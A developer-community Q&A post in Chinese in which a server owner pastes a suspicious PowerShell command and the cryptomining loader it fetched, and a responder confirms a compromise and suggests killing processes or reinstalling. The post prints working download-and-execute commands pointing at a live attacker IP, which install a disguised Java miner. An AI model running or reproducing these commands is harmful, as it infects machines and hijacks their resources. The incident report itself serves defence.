开发者社区> 问答> 正文

服务器突然弹出一个cmd窗口,这是被入侵了吗?我该如何做?内容:PowerShell -comman

服务器突然弹出一个cmd窗口,这是被入侵了吗?我该如何做?内容: PowerShell -command "$cmd = .DownloadString<'http://104.248.167.144:8333/bitcoins'>; Invoke-Expression $cmd; Stop-Process -Force -processname cmd;'';

打开里面的链接,里面的信息:

if([System.IO.Directory]::Exists($home + '\AppData\Local\bitcoins') -eq $true) { Stop-Process -processname javaw; Start-Sleep -m 10000; [System.IO.Directory]::Delete($home + '\AppData\Local\bitcoins', $true); }

(New-Object System.Net.WebClient).DownloadFile('http://104.248.167.144/bitcoins.zip', $home + '\AppData\Local\bitcoins.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($home + '\AppData\Local\bitcoins.zip', $home + '\AppData\Local'); [System.IO.File]::Delete($home + '\AppData\Local\bitcoins.zip'); &($home + '\AppData\Local\bitcoins\bin\javaw.exe') -server -d64 -Xms64m -jar ($home + '\AppData\Local\bitcoins\bin\btclibrary.dll'); Start-Sleep -m 10000; Stop-Process -Force -processname cmd;

展开
收起
游客wcekjs3yctmwg 2019-11-20 08:14:59 1955 0
1 条回答
写回答
取消 提交回答
  • 技术架构师 阿里云开发者社区技术专家博主 CSDN签约专栏技术博主 掘金签约技术博主 云安全联盟专家 众多开源代码库Commiter

    当前窗口,确认被入侵,链接下载地址,http://104.248.167.144:8333/bitcoins 可以。作为肉鸡,帮挖矿,可以按照目录,杀进程,删除,或者重装系统

    2019-11-20 08:51:44
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
如何运维千台以上游戏云服务器 立即下载
网站/服务器取证 实践与挑战 立即下载
ECS计算与存储分离架构实践 立即下载